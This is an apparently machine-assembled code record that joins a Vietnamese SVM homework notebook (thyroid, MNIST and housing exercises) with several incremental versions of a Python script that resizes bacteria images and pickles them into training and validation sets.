random_state=42)\n", "step-5": "# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n# 
%% [markdown]\n# ### Bài tập 1.\n# - <ins>Yêu cầu</ins>: Ý tưởng cơ bản của thuật toán ``Support Vector Machine`` (``SVM``) là gì? Ý tưởng của thuật toán biên mềm (``soft margin``) ``SVM``. Nêu ý nghĩa của siêu tham số ``C`` trong bài toán cực tiểu hàm mất mát.\n# \n# 1. Ý tưởng cơ bản của SVM là đưa toàn bộ dataset vào không gian nhiều chiều (n chiều), từ đó tìm ra mặt phẳng thích hợp nhất (hyperplane) để phân chia\n# 2. Support Vector Machine thuần (hard margin) thì gặp hai vấn đề chính đó là nó chỉ hoạt động trên dataset ``Linearly Separable`` và thứ 2 đó là nó khá nhạy cảm với biến nhiễu (sensitive to noise). Để tránh vấn đề này, chúng ta cần sử dụng một mô hình linh hoạt \n# hơn. Nhiệm vụ của nó là tìm được mặt phẳng vẫn phân loại tốt nhưng chấp nhận sai lệch ở một mức độ chấp nhận được.\n# 3. Tham số `C` là hằng số dương giúp cân đối độ lớn của margin và sự hy sinh của các điểm nằm trong vùng không an toàn. Khi $C = \\infty $ hoặc rất lớn, Soft Margin SVM trở thành Hard Margin SVM.\n# %% [markdown]\n# ### Bài tập 2.\n# - <ins>Yêu cầu</ins>: Sử dụng mô hình ``SVM`` thuộc thư viện ``sklearn`` để xây dựng mô hình phân loại dựa trên tập dữ liệu huấn luyện ``X_train``, ``y_train``. Hãy nhận xét về tỉ lệ nhãn ``0`` và ``1`` trong bộ dữ liệu đã cho như đoạn code bên dưới. 
Hãy thử thay đổi giá trị của tham số ``C`` và nhận xét các độ đo ``Recall``, ``Precison``, ``F1-score``, và ``Accuracy`` của mô hình thu được trên tập dữ liệu kiểm tra ``X_test``, ``y_test``.\n# - Nguồn tham khảo dữ liệu ``thyroid_sick.csv``: https://archive.ics.uci.edu/ml/datasets/Thyroid+Disease\n\n# %%\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import preprocessing\nfrom sklearn.metrics import classification_report, confusion_matrix, accuracy_score\nimport itertools\nimport numpy as np\nfrom sklearn import preprocessing\n\n# %%\ndf = pd.read_csv('thyroid_sick.csv')\nX = df[[column_name for column_name in df.columns if column_name != 'classes']]\ny = df[['classes']]\nX = preprocessing.StandardScaler().fit(X).transform(X.astype(float))\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)\n\n\n# %%\ndf.pivot_table(index =['classes'], aggfunc='size')\n\n# %% [markdown]\n# * Nhận xét:\n\n# %%\nfrom sklearn import svm\nC_parameter = 10.5\nmean_acc = []\nfor n in np.arange(0.5, C_parameter, 0.5):\n \n #Train Model and Predict \n clf = svm.SVC(C=n).fit(X_train,y_train)\n yhat=clf.predict(X_test)\n cnf_matrix = confusion_matrix(y_test, yhat)\n\n mean_acc.append(float(accuracy_score(y_test, yhat)))\n print(\"Result with C = \" + str(n))\n np.set_printoptions(precision=2)\n print (classification_report(y_test, yhat))\n\nprint( \"The best accuracy was with\", max(mean_acc), \"with C=\", n)\n\n# %% [markdown]\n# ### Bài tập 3.\n# - <ins>Yêu cầu</ins>: Ý tưởng của hàm ``kernel`` $K(\\dots, \\dots)$ là gì? Khi nào chúng ta áp dụng hàm ``kernel``? Chúng ta có cần biết biểu thức của hàm $\\Phi(x)$ không?\n# 1. Kernel SVM là việc đi tìm một hàm số biến đổi dữ liệu $x$ từ không gian feature ban đầu thành dữ liệu trong một không gian mới bằng hàm số $\\Phi(\\mathbf{x})$. 
Hàm số này cần thoả mãn mục đích đó là tronng không gian mới, dữ liệu giữa hai classes là phân biệt tuyến tính hoặc gần như phần biệt tuyến tính.\n# 2. Chúng ta áp dụng hàm ``kernel`` khi dữ liệu không phân biệt tuyến tính, Với dữ liệu gần phân biệt tuyến tính, linear và poly kernels cho kết quả tốt hơn.\n# 3.\n# %% [markdown]\n# ### Bài tập 4.\n# - <ins>Yêu cầu</ins>: Cho điểm dữ liệu trong không gian hai chiều $x = [x_1, x_2]^T$ và hàm biến đổi sang không gian năm chiều $\\Phi(x) = [1, \\sqrt{2}x_1, \\sqrt{2}x_2, x_1^2, \\sqrt{2}x_1x_2, x_2^2]^T$. Hãy tính hàm ``kernel`` $K(a, b)$.\n# \n# \\begin{eqnarray}\n# \\Phi(\\mathbf{x})^T\\Phi(\\mathbf{z}) &=& [1, \\sqrt{2} x_1, \\sqrt{2} x_2, x_1^2, \\sqrt{2} x_1x_2, x_2^2] [1, \\sqrt{2} z_1, \\sqrt{2} z_2, z_1^2, \\sqrt{2} z_1z_2, z_2^2]^T \\\\\n# &=& 1 + 2x_1z_1 + 2x_2z_2 + x_1^2x_2^2 + 2x_1z_1x_2z_2 + x_2^2z_2^2 \\\\\n# &=& (1 + x_1z_1 + x_2z_2)^2 = (1 + \\mathbf{x}^T\\mathbf{z})^2 = k(\\mathbf{x}, \\mathbf{z})\n# \\end{eqnarray}\n# %% [markdown]\n# ### Bài tập 5.\n# - <ins>Yêu cầu</ins>: Giả sử bạn dùng bộ phân loại ``SVM`` với hàm ``kernel`` (radial basis function) ``RBF`` cho tập huấn luyện và thấy mô hình phân loại chưa tốt. Để cải thiện, bạn sẽ giảm hay tăng tham số $\\gamma$ trong công thức hàm ``kernel``, tham số ``C`` trong hàm mất mát.\n# %% [markdown]\n# ### Bài tập 6. (Exercise 9 trang 174, Chapter 5: Support Vector Machines)\n# - <ins>Yêu cầu</ins>: Huấn luyện một bộ phân lớp ``SVM`` dựa trên bộ dữ liệu ``MNIST`` (dùng để phân loại hình ảnh các ký tự số có cùng kích thước). Bởi vì bộ phân loại ``SVM`` là bộ phân lớp nhị phân, chúng ta sẽ cần sử dụng chiến thuật ``one-versus-the-rest`` để phân loại tất cả ``10`` ký tự số (trong thực tế chúng ta chỉ dùng chiến thuật ``one-versus-one`` trong các trường hợp dữ liệu nhỏ). 
Bạn hãy báo cáo độ chính xác (``accuracy``) của mô hình đã huấn luyện trên tập test.\n\n# %%\nimport numpy as np\nfrom sklearn.svm import LinearSVC\nfrom sklearn.datasets import fetch_openml\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.preprocessing import StandardScaler\nmnist = fetch_openml('mnist_784', version=1, cache=True)\n\n# %%\nX = mnist[\"data\"]\ny = mnist[\"target\"].astype(np.uint8)\n\nX_train = X[:60000]\ny_train = y[:60000]\nX_test = X[60000:]\ny_test = y[60000:]\nlin_clf = LinearSVC(random_state=42)\nlin_clf.fit(X_train, y_train)\ny_pred = lin_clf.predict(X_train)\naccuracy_score(y_train, y_pred)\n\n# %%\ny_test_predict =lin_clf.predict(X_test)\naccuracy_score(y_test, y_test_predict)\n# %%\nScaler = StandardScaler()\nX_train_scaled = Scaler.fit_transform(X_train.astype(np.float32))\nX_test_scaled = Scaler.fit_transform(X_test.astype(np.float32))\n# %%\nlin_clf = LinearSVC(random_state =42)\nlin_clf.fit(X_train, y_train)\ny_pred = lin_clf.predict(X_train)\naccuracy_score(y_train, y_pred)\n# %%\ny_test_predict = lin_clf.predict(X_test_scaled)\naccuracy_score(y_test, y_test_predict)\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom scipy.stats import reciproca, uniform\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom scipy.stats import reciprocal, uniform\nfrom sklearn.svm import SVC\n\nparam_distributions = {\"gamma\": reciprocal(0.001, 0.1), \"C\": uniform(1, 10)}\nrnd_search_cv = RandomizedSearchCV(svm_clf, param_distributions, n_iter=10, verbose=2, cv=3)\nrnd_search_cv.fit(X_train_scaled[:1000], y_train[:1000])\n\n# %% [markdown]\n# ### Bài tập 7. 
(Exercise 10 trang 174, Chapter 5: Support Vector Machines)\n# - <ins>Yêu cầu</ins>: Hãy huấn luyện một mô hình hồi quy tuyến tính với dữ liệu giá nhà ``California housing dataset``.\n\n# %%\nfrom sklearn.datasets import fetch_california_housing\nfrom sklearn.model_selection import train_test_split\n\n\nhousing = fetch_california_housing()\nX = housing[\"data\"]\ny = housing[\"target\"]\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\n\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
<|reserved_special_token_0|> def rotate_img(image, angle, color, filter=Image.NEAREST): if image.mode == 'P' or filter == Image.NEAREST: matte = Image.new('1', image.size, 1) else: matte = Image.new('L', image.size, 255) bg = Image.new(image.mode, image.size, color) bg.paste(image.rotate(angle, filter), matte.rotate(angle, filter)) return bg def make_greyscale_white_bg(im, r, b, g): im = im.convert('RGBA') data = np.array(im) red, green, blue, alpha = data.T grey_areas = (red == r) & (blue == b) & (green == g) data[..., :-1][grey_areas.T] = 255, 255, 255 im2 = Image.fromarray(data) im2 = im2.convert('L') return im2 <|reserved_special_token_0|> def maybe_pickle(data_folders, min_num_images_per_class, force=False): dataset_names = [] folders_list = os.listdir(data_folders) for folder in folders_list: curr_folder_path = os.path.join(data_folders, folder) if os.path.isdir(curr_folder_path): set_filename = curr_folder_path + '.pickle' dataset_names.append(set_filename) if os.path.exists(set_filename) and not force: print('%s already present - Skipping pickling.' % set_filename) else: print('Pickling %s.' 
% set_filename) dataset = load_letter(curr_folder_path, min_num_images_per_class) try: with open(set_filename, 'wb') as f: pickle.dump(dataset, f, pickle.HIGHEST_PROTOCOL) f.close() except Exception as e: print('Unable to save data to', set_filename, ':', e) return dataset_names <|reserved_special_token_0|> def merge_datasets(pickle_files, train_size, valid_size=0): num_classes = len(pickle_files) valid_dataset, valid_labels = make_arrays(valid_size, image_size) train_dataset, train_labels = make_arrays(train_size, image_size) vsize_per_class = valid_size // num_classes tsize_per_class = train_size // num_classes start_v, start_t = 0, 0 end_v, end_t = vsize_per_class, tsize_per_class end_l = vsize_per_class + tsize_per_class for label, pickle_file in enumerate(pickle_files): try: with open(pickle_file, 'rb') as f: letter_set = pickle.load(f) f.close() np.random.shuffle(letter_set) if valid_dataset is not None: valid_letter = letter_set[:vsize_per_class, :, :] valid_dataset[start_v:end_v, :, :] = valid_letter valid_labels[start_v:end_v] = label start_v += vsize_per_class end_v += vsize_per_class train_letter = letter_set[vsize_per_class:end_l, :, :] train_dataset[start_t:end_t, :, :] = train_letter train_labels[start_t:end_t] = label start_t += tsize_per_class end_t += tsize_per_class except Exception as e: print('Unable to process data from', pickle_file, ':', e) raise return valid_dataset, valid_labels, train_dataset, train_labels <|reserved_special_token_0|> def randomize(dataset, labels): permutation = np.random.permutation(labels.shape[0]) shuffled_dataset = dataset[permutation, :, :] shuffled_labels = labels[permutation] return shuffled_dataset, shuffled_labels <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def rotate_img(image, angle, color, filter=Image.NEAREST): if image.mode == 'P' or filter == Image.NEAREST: matte = Image.new('1', image.size, 1) else: matte = Image.new('L', image.size, 255) bg = 
Image.new(image.mode, image.size, color) bg.paste(image.rotate(angle, filter), matte.rotate(angle, filter)) return bg def make_greyscale_white_bg(im, r, b, g): im = im.convert('RGBA') data = np.array(im) red, green, blue, alpha = data.T grey_areas = (red == r) & (blue == b) & (green == g) data[..., :-1][grey_areas.T] = 255, 255, 255 im2 = Image.fromarray(data) im2 = im2.convert('L') return im2 def process_images(folder): classes = [os.path.join(folder, d) for d in sorted(os.listdir(folder))] img_cnt = 0 for class_x in classes: if os.path.isdir(class_x): images = [os.path.join(class_x, i) for i in sorted(os.listdir( class_x)) if i != '.DS_Store'] for image in images: img_cnt = img_cnt + 1 if img_cnt % 1000 == 0: print('Processed %s images' % str(img_cnt)) im = Image.open(image) im = im.resize(dimensions) im.save(image) print('Finished processing images, images found = ') print(img_cnt) <|reserved_special_token_0|> def load_letter(folder, min_num_images): image_files = os.listdir(folder) dataset = np.ndarray(shape=(len(image_files), image_size, image_size, 3 ), dtype=np.float32) print(dataset.shape) num_images = 0 for image_index, image in enumerate(image_files): image_file = os.path.join(folder, image) try: image_data = (ndimage.imread(image_file).astype(float) - pixel_depth / 2) / pixel_depth print(image_data.shape) if image_data.shape != (image_size, image_size, 3): raise Exception('Unexpected image shape: %s' % str( image_data.shape)) dataset[num_images, :, :] = image_data num_images = num_images + 1 except IOError as e: print('Could not read:', image_file, ':', e, "- it's ok, skipping." 
) dataset = dataset[0:num_images, :, :] if num_images < min_num_images: raise Exception('Many fewer images than expected: %d < %d' % ( num_images, min_num_images)) print('Full dataset tensor:', dataset.shape) print('Mean:', np.mean(dataset)) print('Standard deviation:', np.std(dataset)) return dataset def maybe_pickle(data_folders, min_num_images_per_class, force=False): dataset_names = [] folders_list = os.listdir(data_folders) for folder in folders_list: curr_folder_path = os.path.join(data_folders, folder) if os.path.isdir(curr_folder_path): set_filename = curr_folder_path + '.pickle' dataset_names.append(set_filename) if os.path.exists(set_filename) and not force: print('%s already present - Skipping pickling.' % set_filename) else: print('Pickling %s.' % set_filename) dataset = load_letter(curr_folder_path, min_num_images_per_class) try: with open(set_filename, 'wb') as f: pickle.dump(dataset, f, pickle.HIGHEST_PROTOCOL) f.close() except Exception as e: print('Unable to save data to', set_filename, ':', e) return dataset_names <|reserved_special_token_0|> def make_arrays(nb_rows, img_size): if nb_rows: dataset = np.ndarray((nb_rows, img_size, img_size, 3), dtype=np.float32 ) labels = np.ndarray(nb_rows, dtype=np.int32) else: dataset, labels = None, None return dataset, labels def merge_datasets(pickle_files, train_size, valid_size=0): num_classes = len(pickle_files) valid_dataset, valid_labels = make_arrays(valid_size, image_size) train_dataset, train_labels = make_arrays(train_size, image_size) vsize_per_class = valid_size // num_classes tsize_per_class = train_size // num_classes start_v, start_t = 0, 0 end_v, end_t = vsize_per_class, tsize_per_class end_l = vsize_per_class + tsize_per_class for label, pickle_file in enumerate(pickle_files): try: with open(pickle_file, 'rb') as f: letter_set = pickle.load(f) f.close() np.random.shuffle(letter_set) if valid_dataset is not None: valid_letter = letter_set[:vsize_per_class, :, :] valid_dataset[start_v:end_v, :, 
:] = valid_letter valid_labels[start_v:end_v] = label start_v += vsize_per_class end_v += vsize_per_class train_letter = letter_set[vsize_per_class:end_l, :, :] train_dataset[start_t:end_t, :, :] = train_letter train_labels[start_t:end_t] = label start_t += tsize_per_class end_t += tsize_per_class except Exception as e: print('Unable to process data from', pickle_file, ':', e) raise return valid_dataset, valid_labels, train_dataset, train_labels <|reserved_special_token_0|> def randomize(dataset, labels): permutation = np.random.permutation(labels.shape[0]) shuffled_dataset = dataset[permutation, :, :] shuffled_labels = labels[permutation] return shuffled_dataset, shuffled_labels <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def rotate_img(image, angle, color, filter=Image.NEAREST): if image.mode == 'P' or filter == Image.NEAREST: matte = Image.new('1', image.size, 1) else: matte = Image.new('L', image.size, 255) bg = Image.new(image.mode, image.size, color) bg.paste(image.rotate(angle, filter), matte.rotate(angle, filter)) return bg def make_greyscale_white_bg(im, r, b, g): im = im.convert('RGBA') data = np.array(im) red, green, blue, alpha = data.T grey_areas = (red == r) & (blue == b) & (green == g) data[..., :-1][grey_areas.T] = 255, 255, 255 im2 = Image.fromarray(data) im2 = im2.convert('L') return im2 def process_images(folder): classes = [os.path.join(folder, d) for d in sorted(os.listdir(folder))] img_cnt = 0 for class_x in classes: if os.path.isdir(class_x): images = [os.path.join(class_x, i) for i in sorted(os.listdir( class_x)) if i != '.DS_Store'] for image in images: img_cnt = img_cnt + 1 if img_cnt % 1000 == 0: print('Processed %s images' % str(img_cnt)) im = Image.open(image) im = im.resize(dimensions) im.save(image) print('Finished processing images, images found = ') print(img_cnt) process_images(test_folder) process_images(train_folder) print('ok') <|reserved_special_token_0|> def load_letter(folder, 
min_num_images): image_files = os.listdir(folder) dataset = np.ndarray(shape=(len(image_files), image_size, image_size, 3 ), dtype=np.float32) print(dataset.shape) num_images = 0 for image_index, image in enumerate(image_files): image_file = os.path.join(folder, image) try: image_data = (ndimage.imread(image_file).astype(float) - pixel_depth / 2) / pixel_depth print(image_data.shape) if image_data.shape != (image_size, image_size, 3): raise Exception('Unexpected image shape: %s' % str( image_data.shape)) dataset[num_images, :, :] = image_data num_images = num_images + 1 except IOError as e: print('Could not read:', image_file, ':', e, "- it's ok, skipping." ) dataset = dataset[0:num_images, :, :] if num_images < min_num_images: raise Exception('Many fewer images than expected: %d < %d' % ( num_images, min_num_images)) print('Full dataset tensor:', dataset.shape) print('Mean:', np.mean(dataset)) print('Standard deviation:', np.std(dataset)) return dataset def maybe_pickle(data_folders, min_num_images_per_class, force=False): dataset_names = [] folders_list = os.listdir(data_folders) for folder in folders_list: curr_folder_path = os.path.join(data_folders, folder) if os.path.isdir(curr_folder_path): set_filename = curr_folder_path + '.pickle' dataset_names.append(set_filename) if os.path.exists(set_filename) and not force: print('%s already present - Skipping pickling.' % set_filename) else: print('Pickling %s.' 
% set_filename) dataset = load_letter(curr_folder_path, min_num_images_per_class) try: with open(set_filename, 'wb') as f: pickle.dump(dataset, f, pickle.HIGHEST_PROTOCOL) f.close() except Exception as e: print('Unable to save data to', set_filename, ':', e) return dataset_names <|reserved_special_token_0|> def make_arrays(nb_rows, img_size): if nb_rows: dataset = np.ndarray((nb_rows, img_size, img_size, 3), dtype=np.float32 ) labels = np.ndarray(nb_rows, dtype=np.int32) else: dataset, labels = None, None return dataset, labels def merge_datasets(pickle_files, train_size, valid_size=0): num_classes = len(pickle_files) valid_dataset, valid_labels = make_arrays(valid_size, image_size) train_dataset, train_labels = make_arrays(train_size, image_size) vsize_per_class = valid_size // num_classes tsize_per_class = train_size // num_classes start_v, start_t = 0, 0 end_v, end_t = vsize_per_class, tsize_per_class end_l = vsize_per_class + tsize_per_class for label, pickle_file in enumerate(pickle_files): try: with open(pickle_file, 'rb') as f: letter_set = pickle.load(f) f.close() np.random.shuffle(letter_set) if valid_dataset is not None: valid_letter = letter_set[:vsize_per_class, :, :] valid_dataset[start_v:end_v, :, :] = valid_letter valid_labels[start_v:end_v] = label start_v += vsize_per_class end_v += vsize_per_class train_letter = letter_set[vsize_per_class:end_l, :, :] train_dataset[start_t:end_t, :, :] = train_letter train_labels[start_t:end_t] = label start_t += tsize_per_class end_t += tsize_per_class except Exception as e: print('Unable to process data from', pickle_file, ':', e) raise return valid_dataset, valid_labels, train_dataset, train_labels <|reserved_special_token_0|> print('Training:', train_dataset.shape, train_labels.shape) print('Validation:', valid_dataset.shape, valid_labels.shape) def randomize(dataset, labels): permutation = np.random.permutation(labels.shape[0]) shuffled_dataset = dataset[permutation, :, :] shuffled_labels = 
labels[permutation] return shuffled_dataset, shuffled_labels <|reserved_special_token_0|> try: f = open(pickle_file, 'wb') save = {'train_dataset': train_dataset, 'train_labels': train_labels, 'valid_dataset': valid_dataset, 'valid_labels': valid_labels} pickle.dump(save, f, pickle.HIGHEST_PROTOCOL) f.close() except Exception as e: print('Unable to save data to', pickle_file, ':', e) raise <|reserved_special_token_0|> print('Compressed pickle size:', statinfo.st_size) <|reserved_special_token_1|> from __future__ import print_function import matplotlib.pyplot as plt import numpy as np import os import sys import tarfile import tensorflow as tf from IPython.display import display, Image from scipy import ndimage from sklearn.linear_model import LogisticRegression from six.moves.urllib.request import urlretrieve from six.moves import cPickle as pickle from PIL import Image from six.moves import range train_folder = './data/train' test_folder = './data/valid' dimensions = 229, 229 max_angle = 15 def rotate_img(image, angle, color, filter=Image.NEAREST): if image.mode == 'P' or filter == Image.NEAREST: matte = Image.new('1', image.size, 1) else: matte = Image.new('L', image.size, 255) bg = Image.new(image.mode, image.size, color) bg.paste(image.rotate(angle, filter), matte.rotate(angle, filter)) return bg def make_greyscale_white_bg(im, r, b, g): im = im.convert('RGBA') data = np.array(im) red, green, blue, alpha = data.T grey_areas = (red == r) & (blue == b) & (green == g) data[..., :-1][grey_areas.T] = 255, 255, 255 im2 = Image.fromarray(data) im2 = im2.convert('L') return im2 def process_images(folder): classes = [os.path.join(folder, d) for d in sorted(os.listdir(folder))] img_cnt = 0 for class_x in classes: if os.path.isdir(class_x): images = [os.path.join(class_x, i) for i in sorted(os.listdir( class_x)) if i != '.DS_Store'] for image in images: img_cnt = img_cnt + 1 if img_cnt % 1000 == 0: print('Processed %s images' % str(img_cnt)) im = Image.open(image) im = 
im.resize(dimensions) im.save(image) print('Finished processing images, images found = ') print(img_cnt) process_images(test_folder) process_images(train_folder) print('ok') image_size = 229 pixel_depth = 255.0 def load_letter(folder, min_num_images): image_files = os.listdir(folder) dataset = np.ndarray(shape=(len(image_files), image_size, image_size, 3 ), dtype=np.float32) print(dataset.shape) num_images = 0 for image_index, image in enumerate(image_files): image_file = os.path.join(folder, image) try: image_data = (ndimage.imread(image_file).astype(float) - pixel_depth / 2) / pixel_depth print(image_data.shape) if image_data.shape != (image_size, image_size, 3): raise Exception('Unexpected image shape: %s' % str( image_data.shape)) dataset[num_images, :, :] = image_data num_images = num_images + 1 except IOError as e: print('Could not read:', image_file, ':', e, "- it's ok, skipping." ) dataset = dataset[0:num_images, :, :] if num_images < min_num_images: raise Exception('Many fewer images than expected: %d < %d' % ( num_images, min_num_images)) print('Full dataset tensor:', dataset.shape) print('Mean:', np.mean(dataset)) print('Standard deviation:', np.std(dataset)) return dataset def maybe_pickle(data_folders, min_num_images_per_class, force=False): dataset_names = [] folders_list = os.listdir(data_folders) for folder in folders_list: curr_folder_path = os.path.join(data_folders, folder) if os.path.isdir(curr_folder_path): set_filename = curr_folder_path + '.pickle' dataset_names.append(set_filename) if os.path.exists(set_filename) and not force: print('%s already present - Skipping pickling.' % set_filename) else: print('Pickling %s.' 
% set_filename) dataset = load_letter(curr_folder_path, min_num_images_per_class) try: with open(set_filename, 'wb') as f: pickle.dump(dataset, f, pickle.HIGHEST_PROTOCOL) f.close() except Exception as e: print('Unable to save data to', set_filename, ':', e) return dataset_names train_datasets = maybe_pickle(train_folder, 89, True) test_datasets = maybe_pickle(test_folder, 10, True) def make_arrays(nb_rows, img_size): if nb_rows: dataset = np.ndarray((nb_rows, img_size, img_size, 3), dtype=np.float32 ) labels = np.ndarray(nb_rows, dtype=np.int32) else: dataset, labels = None, None return dataset, labels def merge_datasets(pickle_files, train_size, valid_size=0): num_classes = len(pickle_files) valid_dataset, valid_labels = make_arrays(valid_size, image_size) train_dataset, train_labels = make_arrays(train_size, image_size) vsize_per_class = valid_size // num_classes tsize_per_class = train_size // num_classes start_v, start_t = 0, 0 end_v, end_t = vsize_per_class, tsize_per_class end_l = vsize_per_class + tsize_per_class for label, pickle_file in enumerate(pickle_files): try: with open(pickle_file, 'rb') as f: letter_set = pickle.load(f) f.close() np.random.shuffle(letter_set) if valid_dataset is not None: valid_letter = letter_set[:vsize_per_class, :, :] valid_dataset[start_v:end_v, :, :] = valid_letter valid_labels[start_v:end_v] = label start_v += vsize_per_class end_v += vsize_per_class train_letter = letter_set[vsize_per_class:end_l, :, :] train_dataset[start_t:end_t, :, :] = train_letter train_labels[start_t:end_t] = label start_t += tsize_per_class end_t += tsize_per_class except Exception as e: print('Unable to process data from', pickle_file, ':', e) raise return valid_dataset, valid_labels, train_dataset, train_labels train_size = 89 valid_size = 10 valid_dataset, valid_labels, train_dataset, train_labels = merge_datasets( train_datasets, train_size, valid_size) print('Training:', train_dataset.shape, train_labels.shape) print('Validation:', 
valid_dataset.shape, valid_labels.shape) def randomize(dataset, labels): permutation = np.random.permutation(labels.shape[0]) shuffled_dataset = dataset[permutation, :, :] shuffled_labels = labels[permutation] return shuffled_dataset, shuffled_labels train_dataset, train_labels = randomize(train_dataset, train_labels) valid_dataset, valid_labels = randomize(valid_dataset, valid_labels) pickle_file = './bacteria.pickle' try: f = open(pickle_file, 'wb') save = {'train_dataset': train_dataset, 'train_labels': train_labels, 'valid_dataset': valid_dataset, 'valid_labels': valid_labels} pickle.dump(save, f, pickle.HIGHEST_PROTOCOL) f.close() except Exception as e: print('Unable to save data to', pickle_file, ':', e) raise statinfo = os.stat(pickle_file) print('Compressed pickle size:', statinfo.st_size) <|reserved_special_token_1|> from __future__ import print_function import matplotlib.pyplot as plt import numpy as np import os import sys import tarfile import tensorflow as tf from IPython.display import display, Image from scipy import ndimage from sklearn.linear_model import LogisticRegression from six.moves.urllib.request import urlretrieve from six.moves import cPickle as pickle from PIL import Image from six.moves import range train_folder = './data/train' test_folder = './data/valid' dimensions = (229, 229) max_angle = 15 # rotating image def rotate_img(image, angle, color, filter = Image.NEAREST): if image.mode == "P" or filter == Image.NEAREST: matte = Image.new("1", image.size, 1) # mask else: matte = Image.new("L", image.size, 255) # true matte bg = Image.new(image.mode, image.size, color) bg.paste( image.rotate(angle, filter), matte.rotate(angle, filter) ) return bg # make gray_scale image or 1channel image def make_greyscale_white_bg(im, r, b, g): im = im.convert('RGBA') # Convert to RGBA data = np.array(im) # "data" is a height x width x 4 numpy array red, green, blue, alpha = data.T # Temporarily unpack the bands for readability # Replace grey with 
white... (leaves alpha values alone...) grey_areas = (red == r) & (blue == b) & (green == g) data[..., :-1][grey_areas.T] = (255, 255, 255) # Transpose back needed im2 = Image.fromarray(data) im2 = im2.convert('L') # convert to greyscale image #im2.show() return im2 def process_images(folder): classes = [os.path.join(folder, d) for d in sorted(os.listdir(folder))] # get list of all sub-folders in folder img_cnt = 0 for class_x in classes: if os.path.isdir(class_x): # get paths to all the images in this folder images = [os.path.join(class_x, i) for i in sorted(os.listdir(class_x)) if i != '.DS_Store'] for image in images: img_cnt = img_cnt + 1 if(img_cnt % 1000 == 0): print("Processed %s images" % str(img_cnt)) im = Image.open(image) im = im.resize(dimensions) # resize image according to dimensions set im.save(image) # overwrite previous image file with new image print("Finished processing images, images found = ") print(img_cnt) process_images(test_folder) process_images(train_folder) print('ok') image_size = 229 # Pixel width and height. pixel_depth = 255.0 # Number of levels per pixel. 
def load_letter(folder, min_num_images): image_files = os.listdir(folder) dataset = np.ndarray(shape=(len(image_files), image_size, image_size, 3), dtype=np.float32) print(dataset.shape) num_images = 0 for image_index, image in enumerate(image_files): image_file = os.path.join(folder, image) try: image_data = (ndimage.imread(image_file).astype(float) - pixel_depth / 2) / pixel_depth print(image_data.shape) if image_data.shape != (image_size, image_size, 3): raise Exception('Unexpected image shape: %s' % str(image_data.shape)) dataset[num_images, :, :] = image_data num_images = num_images + 1 except IOError as e: print('Could not read:', image_file, ':', e, '- it\'s ok, skipping.') dataset = dataset[0:num_images, :, :] if num_images < min_num_images: raise Exception('Many fewer images than expected: %d < %d' % (num_images, min_num_images)) print('Full dataset tensor:', dataset.shape) print('Mean:', np.mean(dataset)) print('Standard deviation:', np.std(dataset)) return dataset def maybe_pickle(data_folders, min_num_images_per_class, force=False): dataset_names = [] folders_list = os.listdir(data_folders) for folder in folders_list: #print(os.path.join(data_folders, folder)) curr_folder_path = os.path.join(data_folders, folder) if os.path.isdir(curr_folder_path): set_filename = curr_folder_path + '.pickle' dataset_names.append(set_filename) if os.path.exists(set_filename) and not force: # # You may override by setting force=True. print('%s already present - Skipping pickling.' % set_filename) else: print('Pickling %s.' 
% set_filename) dataset = load_letter(curr_folder_path, min_num_images_per_class) try: with open(set_filename, 'wb') as f: pickle.dump(dataset, f, pickle.HIGHEST_PROTOCOL) f.close() except Exception as e: print('Unable to save data to', set_filename, ':', e) return dataset_names train_datasets = maybe_pickle(train_folder, 89, True) test_datasets = maybe_pickle(test_folder, 10, True) def make_arrays(nb_rows, img_size): if nb_rows: dataset = np.ndarray((nb_rows, img_size, img_size, 3), dtype=np.float32) labels = np.ndarray(nb_rows, dtype=np.int32) else: dataset, labels = None, None return dataset, labels def merge_datasets(pickle_files, train_size, valid_size=0): num_classes = len(pickle_files) valid_dataset, valid_labels = make_arrays(valid_size, image_size) train_dataset, train_labels = make_arrays(train_size, image_size) vsize_per_class = valid_size // num_classes tsize_per_class = train_size // num_classes start_v, start_t = 0, 0 end_v, end_t = vsize_per_class, tsize_per_class end_l = vsize_per_class+tsize_per_class for label, pickle_file in enumerate(pickle_files): try: with open(pickle_file, 'rb') as f: letter_set = pickle.load(f) f.close() # let's shuffle the letters to have random validation and training set np.random.shuffle(letter_set) if valid_dataset is not None: valid_letter = letter_set[:vsize_per_class, :, :] valid_dataset[start_v:end_v, :, :] = valid_letter valid_labels[start_v:end_v] = label start_v += vsize_per_class end_v += vsize_per_class train_letter = letter_set[vsize_per_class:end_l, :, :] train_dataset[start_t:end_t, :, :] = train_letter train_labels[start_t:end_t] = label start_t += tsize_per_class end_t += tsize_per_class except Exception as e: print('Unable to process data from', pickle_file, ':', e) raise return valid_dataset, valid_labels, train_dataset, train_labels train_size = 89 valid_size = 10 valid_dataset, valid_labels, train_dataset, train_labels = merge_datasets( train_datasets, train_size, valid_size) # _, _, test_dataset, 
test_labels = merge_datasets(test_datasets, test_size) print('Training:', train_dataset.shape, train_labels.shape) print('Validation:', valid_dataset.shape, valid_labels.shape) # print('Testing:', test_dataset.shape, test_labels.shape) def randomize(dataset, labels): permutation = np.random.permutation(labels.shape[0]) shuffled_dataset = dataset[permutation,:,:] shuffled_labels = labels[permutation] return shuffled_dataset, shuffled_labels train_dataset, train_labels = randomize(train_dataset, train_labels) # test_dataset, test_labels = randomize(test_dataset, test_labels) valid_dataset, valid_labels = randomize(valid_dataset, valid_labels) pickle_file = './bacteria.pickle' try: f = open(pickle_file, 'wb') save = { 'train_dataset': train_dataset, 'train_labels': train_labels, 'valid_dataset': valid_dataset, 'valid_labels': valid_labels, } pickle.dump(save, f, pickle.HIGHEST_PROTOCOL) f.close() except Exception as e: print('Unable to save data to', pickle_file, ':', e) raise statinfo = os.stat(pickle_file) print('Compressed pickle size:', statinfo.st_size)
flexible
